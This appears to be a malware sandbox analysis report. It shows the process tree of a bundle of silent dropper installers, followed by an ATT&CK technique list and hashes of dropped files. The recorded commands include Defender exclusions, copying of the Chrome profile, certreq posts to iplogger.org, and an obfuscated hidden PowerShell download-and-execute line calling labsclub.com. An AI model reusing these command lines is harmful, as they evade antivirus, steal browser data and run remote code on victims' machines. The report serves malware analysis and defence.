C:\Users\Admin\AppData\Local\Temp\is-4G02C.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4G02C.tmp\ProPlugin.tmp" /SL5="$10A12,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\ProPlugin.exe" /Verysilent
10⤵
PID:6724

C:\Users\Admin\AppData\Local\Temp\is-CCD4E.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-CCD4E.tmp\Setup.exe"
11⤵
PID:10744

C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
12⤵
PID:10896

C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\PictureLAb.exe" /Verysilent
9⤵
PID:10768

C:\Users\Admin\AppData\Local\Temp\is-ADOED.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ADOED.tmp\PictureLAb.tmp" /SL5="$20A12,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\PictureLAb.exe" /Verysilent
10⤵
PID:10792

C:\Users\Admin\AppData\Local\Temp\is-RAV2P.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-RAV2P.tmp\Setup.exe" /VERYSILENT
11⤵
PID:10800

C:\Users\Admin\AppData\Local\Temp\is-LMS9S.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LMS9S.tmp\Setup.tmp" /SL5="$60882,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-RAV2P.tmp\Setup.exe" /VERYSILENT
12⤵
PID:11236

C:\Users\Admin\AppData\Local\Temp\is-VU04J.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-VU04J.tmp\kkkk.exe" /S /UID=lab214
13⤵
PID:11124

C:\Users\Admin\AppData\Local\Temp\4a-41c74-5cc-e1c9f-63d063df81582\Wubyjudakae.exe
"C:\Users\Admin\AppData\Local\Temp\4a-41c74-5cc-e1c9f-63d063df81582\Wubyjudakae.exe"
14⤵
PID:10912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\szun3dwq.ohg\GcleanerWW.exe /mixone & exit
15⤵
PID:5004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l4n1drwe.k0r\privacytools5.exe & exit
15⤵
PID:9412

C:\Users\Admin\AppData\Local\Temp\l4n1drwe.k0r\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\l4n1drwe.k0r\privacytools5.exe
16⤵
PID:9788

C:\Users\Admin\AppData\Local\Temp\l4n1drwe.k0r\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\l4n1drwe.k0r\privacytools5.exe
17⤵
PID:9580

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vgtsx23c.jb3\setup.exe /8-2222 & exit
15⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\vgtsx23c.jb3\setup.exe
C:\Users\Admin\AppData\Local\Temp\vgtsx23c.jb3\setup.exe /8-2222
16⤵
PID:9240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lively-Leaf"
17⤵
PID:2884

C:\Program Files (x86)\Lively-Leaf\7za.exe
"C:\Program Files (x86)\Lively-Leaf\7za.exe" e -p154.61.71.13 winamp-plugins.7z
17⤵
PID:11096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lively-Leaf\setup.exe" -map "C:\Program Files (x86)\Lively-Leaf\WinmonProcessMonitor.sys""
17⤵
PID:6968

C:\Program Files (x86)\Lively-Leaf\setup.exe
"C:\Program Files (x86)\Lively-Leaf\setup.exe" -map "C:\Program Files (x86)\Lively-Leaf\WinmonProcessMonitor.sys"
18⤵
PID:4988

C:\Program Files (x86)\Lively-Leaf\7za.exe
"C:\Program Files (x86)\Lively-Leaf\7za.exe" e -p154.61.71.13 winamp.7z
17⤵
PID:8652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzcqvhto.krs\MultitimerFour.exe & exit
15⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\lzcqvhto.krs\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\lzcqvhto.krs\MultitimerFour.exe
16⤵
PID:11208

C:\Users\Admin\AppData\Local\Temp\EIYVYG6J33\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\EIYVYG6J33\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:8812

C:\Users\Admin\AppData\Local\Temp\EIYVYG6J33\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\EIYVYG6J33\multitimer.exe" 1 3.1615039666.60438cb2caa0e 104
18⤵
PID:10660

C:\Users\Admin\AppData\Local\Temp\EIYVYG6J33\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\EIYVYG6J33\multitimer.exe" 2 3.1615039666.60438cb2caa0e
19⤵
PID:10284

C:\Users\Admin\AppData\Local\Temp\03esuxy3ebr\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\03esuxy3ebr\safebits.exe" /S /pubid=1 /subid=451
20⤵
PID:11184

C:\Users\Admin\AppData\Local\Temp\rx23tcz5vcv\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\rx23tcz5vcv\askinstall24.exe"
20⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
21⤵
PID:5988

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
22⤵
- Kills process with taskkill
PID:608

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
21⤵
PID:8392

C:\Users\Admin\AppData\Local\Temp\1mzqj3k3iax\vict.exe
"C:\Users\Admin\AppData\Local\Temp\1mzqj3k3iax\vict.exe" /VERYSILENT /id=535
20⤵
PID:6112

C:\Users\Admin\AppData\Local\Temp\is-Q7VCN.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q7VCN.tmp\vict.tmp" /SL5="$2057A,870426,780800,C:\Users\Admin\AppData\Local\Temp\1mzqj3k3iax\vict.exe" /VERYSILENT /id=535
21⤵
PID:416

C:\Users\Admin\AppData\Local\Temp\is-L3LL7.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-L3LL7.tmp\wimapi.exe" 535
22⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\fmnndmfihtk\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\fmnndmfihtk\chashepro3.exe" /VERYSILENT
20⤵
PID:10332

C:\Users\Admin\AppData\Local\Temp\is-1MQUI.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MQUI.tmp\chashepro3.tmp" /SL5="$304AA,2012497,58368,C:\Users\Admin\AppData\Local\Temp\fmnndmfihtk\chashepro3.exe" /VERYSILENT
21⤵
PID:11248

C:\Users\Admin\AppData\Local\Temp\ld1er10gtb4\52nk0sxb5y2.exe
"C:\Users\Admin\AppData\Local\Temp\ld1er10gtb4\52nk0sxb5y2.exe" /ustwo INSTALL
20⤵
PID:11260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "52nk0sxb5y2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ld1er10gtb4\52nk0sxb5y2.exe" & exit
21⤵
PID:632

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "52nk0sxb5y2.exe" /f
22⤵
- Kills process with taskkill
PID:9836

C:\Users\Admin\AppData\Local\Temp\vsvyuptaxkl\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\vsvyuptaxkl\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:2448

C:\Users\Admin\AppData\Local\Temp\is-OF1S9.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OF1S9.tmp\Setup3310.tmp" /SL5="$30474,802346,56832,C:\Users\Admin\AppData\Local\Temp\vsvyuptaxkl\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:10132

C:\Users\Admin\AppData\Local\Temp\is-77B07.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-77B07.tmp\Setup.exe" /Verysilent
22⤵
PID:8928

C:\Users\Admin\AppData\Local\Temp\is-APL39.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-APL39.tmp\Setup.tmp" /SL5="$A0702,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-77B07.tmp\Setup.exe" /Verysilent
23⤵
PID:9444

C:\Users\Admin\AppData\Local\Temp\is-5JHA7.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-5JHA7.tmp\ProPlugin.exe" /Verysilent
24⤵
PID:10452

C:\Users\Admin\AppData\Local\Temp\is-52NU7.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-52NU7.tmp\ProPlugin.tmp" /SL5="$30D08,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-5JHA7.tmp\ProPlugin.exe" /Verysilent
25⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\obd1dxj3ozu\app.exe
"C:\Users\Admin\AppData\Local\Temp\obd1dxj3ozu\app.exe" /8-23
20⤵
PID:10932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dawn-Lake"
21⤵
PID:7312

C:\Program Files (x86)\Dawn-Lake\7za.exe
"C:\Program Files (x86)\Dawn-Lake\7za.exe" e -p154.61.71.13 winamp-plugins.7z
21⤵
PID:6824

C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\Delta.exe" /Verysilent
9⤵
PID:11052

C:\Users\Admin\AppData\Local\Temp\is-RC84R.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RC84R.tmp\Delta.tmp" /SL5="$30A12,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\Delta.exe" /Verysilent
10⤵
PID:10756

C:\Users\Admin\AppData\Local\Temp\is-QQDKS.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QQDKS.tmp\Setup.exe" /VERYSILENT
11⤵
PID:10412

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-QQDKS.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
12⤵
PID:4620

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
13⤵
- Kills process with taskkill
PID:9852

C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\zznote.exe" /Verysilent
9⤵
PID:10888

C:\Users\Admin\AppData\Local\Temp\is-V9H70.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V9H70.tmp\zznote.tmp" /SL5="$40A12,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\zznote.exe" /Verysilent
10⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\is-C84IF.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-C84IF.tmp\jg4_4jaa.exe" /silent
11⤵
PID:9368

C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\hjjgaa.exe" /Verysilent
9⤵
PID:10500

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:11200

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:8832

C:\Users\Admin\AppData\Local\Temp\cs2ymx25dys\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\cs2ymx25dys\safebits.exe" /S /pubid=1 /subid=451
5⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\reh5z1z3aw4\pfldd1zuxdw.exe
"C:\Users\Admin\AppData\Local\Temp\reh5z1z3aw4\pfldd1zuxdw.exe" /ustwo INSTALL
5⤵
PID:6476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "pfldd1zuxdw.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\reh5z1z3aw4\pfldd1zuxdw.exe" & exit
6⤵
PID:8180

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "pfldd1zuxdw.exe" /f
7⤵
- Kills process with taskkill
PID:4940

C:\Users\Admin\AppData\Local\Temp\r1ecbpdhpx1\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\r1ecbpdhpx1\chashepro3.exe" /VERYSILENT
5⤵
PID:9972

C:\Users\Admin\AppData\Local\Temp\is-FG50A.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FG50A.tmp\chashepro3.tmp" /SL5="$C002E,2012497,58368,C:\Users\Admin\AppData\Local\Temp\r1ecbpdhpx1\chashepro3.exe" /VERYSILENT
6⤵
PID:9764

C:\Users\Admin\AppData\Local\Temp\3eubepxzoqm\app.exe
"C:\Users\Admin\AppData\Local\Temp\3eubepxzoqm\app.exe" /8-23
5⤵
PID:7492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dry-Water"
6⤵
PID:6360

C:\Program Files (x86)\Dry-Water\7za.exe
"C:\Program Files (x86)\Dry-Water\7za.exe" e -p154.61.71.13 winamp-plugins.7z
6⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Dry-Water\app.exe" -map "C:\Program Files (x86)\Dry-Water\WinmonProcessMonitor.sys""
6⤵
PID:11100

C:\Program Files (x86)\Dry-Water\app.exe
"C:\Program Files (x86)\Dry-Water\app.exe" -map "C:\Program Files (x86)\Dry-Water\WinmonProcessMonitor.sys"
7⤵
PID:11252

C:\Program Files (x86)\Dry-Water\7za.exe
"C:\Program Files (x86)\Dry-Water\7za.exe" e -p154.61.71.13 winamp.7z
6⤵
PID:10640

C:\Program Files (x86)\Dry-Water\app.exe
"C:\Program Files (x86)\Dry-Water\app.exe" /8-23
6⤵
PID:9848

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2F3C0449DF57AB38262A819C3DE16C0B C
2⤵
- Loads dropped DLL
PID:5228

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 56B97F70FE00D705D34DD1429767A6D4 C
2⤵
PID:6836

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:2128

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3548

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5160

C:\Users\Admin\AppData\Local\Temp\is-G8RR5.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G8RR5.tmp\chashepro3.tmp" /SL5="$103DE,2012497,58368,C:\Users\Admin\AppData\Local\Temp\grwzkdm14cn\chashepro3.exe" /VERYSILENT
1⤵
PID:3056

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
2⤵
PID:6412

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
3⤵
PID:6924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
3⤵
PID:7332

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:7920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
2⤵
PID:6368

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
2⤵
PID:5084

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
2⤵
PID:4792

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
3⤵
PID:6236

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
2⤵
PID:3424

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
3⤵
PID:3052

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
2⤵
PID:4884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
2⤵
PID:5864

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
2⤵
PID:2248

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
2⤵
PID:3648

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
3⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\is-I4PS5.tmp\sxr0irvhkja.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I4PS5.tmp\sxr0irvhkja.tmp" /SL5="$400BC,870426,780800,C:\Users\Admin\AppData\Local\Temp\ky0jijv3ciu\sxr0irvhkja.exe" /VERYSILENT
1⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\is-R7L1R.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-R7L1R.tmp\winlthst.exe" test1 test1
2⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\BuWciOcI7.exe
"C:\Users\Admin\AppData\Local\Temp\BuWciOcI7.exe"
3⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 768
4⤵
- Program crash
PID:9052

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
3⤵
PID:4812

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
4⤵
PID:5428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5260

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7240

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5068

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7432

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3956

C:\Users\Admin\AppData\Local\Temp\is-8VII2.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8VII2.tmp\chashepro3.tmp" /SL5="$30392,2012497,58368,C:\Users\Admin\AppData\Local\Temp\2pdpah1wygh\chashepro3.exe" /VERYSILENT
1⤵
PID:8256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:1880

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7640

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:9804

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{12543d9b-10cb-034d-a04f-097d319a8c74}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:7452

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
2⤵
PID:2444

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:8948

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:10092

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:7668

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:11048

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5076

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3364

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6548

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\101547.1
MD5
2d2d46e422f6b82997d224ab0713ff50

SHA1
15d72e08d6971a866b3ab3383919efee1eb43089

SHA256
c6f6bdfaa1e9527e7163aed82e5ee9587d8dc98252ff75611b01ef1bd77cd89b

SHA512
aacebd92805bdf627863b764fa0a8fd115c25b082987c1d2c21e9a7e8b11f8b84376930e78c296f5f3482b00d8202ec40898c7f3e51147e58ac5e841d90a349e

Download Submit
C:\ProgramData\101547.1
MD5
2d2d46e422f6b82997d224ab0713ff50

SHA1
15d72e08d6971a866b3ab3383919efee1eb43089

SHA256
c6f6bdfaa1e9527e7163aed82e5ee9587d8dc98252ff75611b01ef1bd77cd89b

SHA512
aacebd92805bdf627863b764fa0a8fd115c25b082987c1d2c21e9a7e8b11f8b84376930e78c296f5f3482b00d8202ec40898c7f3e51147e58ac5e841d90a349e

Download Submit
C:\ProgramData\1327749.14
MD5
871d46ed9b2e230a77d28aa35698aec2

SHA1
42702c8f7497308cb3893134ba4453fe08217e65

SHA256
2b44e1e45443d676589522c3af1d3bcf593fc707f8b25289d9fb1e7b6d5e2537

SHA512
f1b8c390169f096a4815fb075736a90879a628c2f860bf554fdbe0074a8728a87b632e1b50fae74b610aa8217c4f08c56eeb359ad18bce97bb01783596d0d1e7

Download Submit
C:\ProgramData\1327749.14
MD5
871d46ed9b2e230a77d28aa35698aec2

SHA1
42702c8f7497308cb3893134ba4453fe08217e65

SHA256
2b44e1e45443d676589522c3af1d3bcf593fc707f8b25289d9fb1e7b6d5e2537

SHA512
f1b8c390169f096a4815fb075736a90879a628c2f860bf554fdbe0074a8728a87b632e1b50fae74b610aa8217c4f08c56eeb359ad18bce97bb01783596d0d1e7

Download Submit
C:\ProgramData\6153723.67
MD5
880fd252bc4e801e6170002efb6aef4d

SHA1
b10c102503f73acc57fc14326108e300fa94f8f5

SHA256
9157304786300c4f67a767995b5432d524e18243642c8dc5f96a44b4792ae911

SHA512
91071cd35e463d06f42c1cfb80be89a4fb8749f4936e699080ff0088281a3483c03f19beefd8f9ab403364475327e15b5ee65162a917f7a47b162a8105fc40a2

Download Submit
C:\ProgramData\6153723.67
MD5
880fd252bc4e801e6170002efb6aef4d

SHA1
b10c102503f73acc57fc14326108e300fa94f8f5

SHA256
9157304786300c4f67a767995b5432d524e18243642c8dc5f96a44b4792ae911

SHA512
91071cd35e463d06f42c1cfb80be89a4fb8749f4936e699080ff0088281a3483c03f19beefd8f9ab403364475327e15b5ee65162a917f7a47b162a8105fc40a2

Download Submit
C:\ProgramData\7654484.84
MD5
871d46ed9b2e230a77d28aa35698aec2

SHA1
